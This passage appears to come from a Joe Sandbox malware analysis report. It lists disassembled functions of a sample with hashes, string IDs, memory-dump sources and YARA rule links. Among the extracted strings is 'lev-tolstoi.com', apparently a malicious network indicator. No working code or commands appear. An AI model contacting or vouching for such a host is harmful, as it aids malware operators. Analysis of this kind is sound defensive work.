                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                                • API String ID: 0-3257051659
                                                                                                                                                                                                                                                                • Opcode ID: 16ae58258520342e596a30300cd34cf8cb70c636570e4c12a4d7bee02db37a58
                                                                                                                                                                                                                                                                • Instruction ID: 2cce882ca275d6882438546bfd21de4e5a15b277147a3c6a06e135c6dfcc6918
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16ae58258520342e596a30300cd34cf8cb70c636570e4c12a4d7bee02db37a58
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57A14876A143508BD728CF28DC5176FB7D2FBC4318F5A8A3DD585DB3A1DA3898068781
                                                                                                                                                                                                                                                                Function 00401340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 9deZ$eb$sp${s
                                                                                                                                                                                                                                                                • API String ID: 0-3993331145
                                                                                                                                                                                                                                                                • Opcode ID: ac4ffd6ae05c15c8212d6c69b0aca419959ba7b321130c00f5d6a115418b9d9c
                                                                                                                                                                                                                                                                • Instruction ID: 6458466d85c6ffe98ff568997d56b8937b2eeb3eccf141fc30c31ab26a00cdc1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac4ffd6ae05c15c8212d6c69b0aca419959ba7b321130c00f5d6a115418b9d9c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47D1F4B16183148BC728DF24C8A166BB7F2FFD1354F089A2DE4969B3A0E7789904C756
                                                                                                                                                                                                                                                                Function 004091AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004091DA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: +Ku$wpq
                                                                                                                                                                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                                                • Opcode ID: b9f43b2606bcacedb1b5ec1aeaf9004db3313775fb5074090241fea00bdb5ec7
                                                                                                                                                                                                                                                                • Instruction ID: 745aec20b7dc2cf1c221fb37dcce27eedce6e330906c57cd06949b9ae9d812c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9f43b2606bcacedb1b5ec1aeaf9004db3313775fb5074090241fea00bdb5ec7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E51BD7221C3518FC324CF29984076FB7E2EBC5310F55892EE499CB2C5DB34D90A8B92
                                                                                                                                                                                                                                                                Function 004090D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00409170
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: M/($M/(
                                                                                                                                                                                                                                                                • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                                • Opcode ID: 5ccba946f08c7c65f5960b6106ec9ed293f805d4b7c7694f326ce00f44be5bf9
                                                                                                                                                                                                                                                                • Instruction ID: 5780e10d47c6d73161d66cfac6a928ec1cc399456c86052081acc469c54c8a26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ccba946f08c7c65f5960b6106ec9ed293f805d4b7c7694f326ce00f44be5bf9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1221237165C3515FE714CE34988179FBBAAEBC6700F01892CE4D1EB2C5D679880BC756
                                                                                                                                                                                                                                                                Function 0040A0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                                • API String ID: 0-3117400391
                                                                                                                                                                                                                                                                • Opcode ID: bdd2cb9d5e07635f75fd939429c093274597243337950132fed5976687001e54
                                                                                                                                                                                                                                                                • Instruction ID: b54e5a9055dcea9f4e2ef5537ef2de55add5ada1cc68386b69f960872f4b9820
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdd2cb9d5e07635f75fd939429c093274597243337950132fed5976687001e54
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECC12E7060C380DFD7149F29E84162BBBE2AF85310F488ABDF495472E2D73999568B17
                                                                                                                                                                                                                                                                Function 0059435F Relevance: 4.1, Strings: 2, Instructions: 1583COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: D7!g$I/`[
                                                                                                                                                                                                                                                                • API String ID: 0-3997986174
                                                                                                                                                                                                                                                                • Opcode ID: 14af1053e74841fa53dc76244a9bbcb909bb1837a57339724d074cdbe832e135
                                                                                                                                                                                                                                                                • Instruction ID: 0ca3eb27db681a8d7206fc6222346564d49badd1bced95644cc7129a0dfd7e60
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14af1053e74841fa53dc76244a9bbcb909bb1837a57339724d074cdbe832e135
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7B2D5F360C6009FE704AE2DEC8567AFBE9EF94720F16893DE6C483744EA3558058697
                                                                                                                                                                                                                                                                Function 003ED4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Fm$V]$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-1622397547
                                                                                                                                                                                                                                                                • Opcode ID: 1e3846b2498f430f937bee816dc3a1db8597f4ee72130f76522c6c746b4ccea1
                                                                                                                                                                                                                                                                • Instruction ID: 6bc032c5493e5d71536b5b3465467cda8d97e07f261e4db83ade1fa6b842392f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e3846b2498f430f937bee816dc3a1db8597f4ee72130f76522c6c746b4ccea1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A391D5B62557908FD326CF2AC480656BFA2EFD631876E869CC0954F756C33AE807CB50
                                                                                                                                                                                                                                                                Function 003FD003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: [V$bh
                                                                                                                                                                                                                                                                • API String ID: 0-2174178241
                                                                                                                                                                                                                                                                • Opcode ID: 4490c21e4526e7ab47664312bece51eb8373e77724cdb752fbe4dcdb45a8e35b
                                                                                                                                                                                                                                                                • Instruction ID: 507dc818ae109bf416ba88655e90edc5520927858d8d977b2f8616241f98694c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4490c21e4526e7ab47664312bece51eb8373e77724cdb752fbe4dcdb45a8e35b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03268B1901716CBCB25CF28C8916B7B7B2FF95310F19825DD9969F394E738A842CB90
                                                                                                                                                                                                                                                                Function 0058E211 Relevance: 3.3, Strings: 2, Instructions: 761COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ]ioG$lJv}
                                                                                                                                                                                                                                                                • API String ID: 0-2860389727
                                                                                                                                                                                                                                                                • Opcode ID: ae6840ce025de0326b0315fa72f85820250028c86c7b3d8176fe93981fe84b4d
                                                                                                                                                                                                                                                                • Instruction ID: 785503258df957e68bf308ac56e4f942a29aaed461be4d90a8cda732420b2a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae6840ce025de0326b0315fa72f85820250028c86c7b3d8176fe93981fe84b4d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9232B2F350C200AFE3046F29EC8567AFBE9EF94720F1A492DEAC493740E63558558B97
                                                                                                                                                                                                                                                                Function 004B6551 Relevance: 3.0, Strings: 2, Instructions: 520COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /Cul$V_
                                                                                                                                                                                                                                                                • API String ID: 0-3372171723
                                                                                                                                                                                                                                                                • Opcode ID: 5afec70fcd3fc204da278c0e8f21fa3a2689d0a23d8355dd2f9b83860226cb69
                                                                                                                                                                                                                                                                • Instruction ID: 10ab63106a5ba543df12c9133ee7cb68713d6dd359d791fbcd9c8c972a318f41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5afec70fcd3fc204da278c0e8f21fa3a2689d0a23d8355dd2f9b83860226cb69
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F202F1F3E146248BF3445E38DC59366B692DB94320F2F823C9E989B7C4E97E9D094385
                                                                                                                                                                                                                                                                Function 0044A574 Relevance: 2.9, Strings: 2, Instructions: 415COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
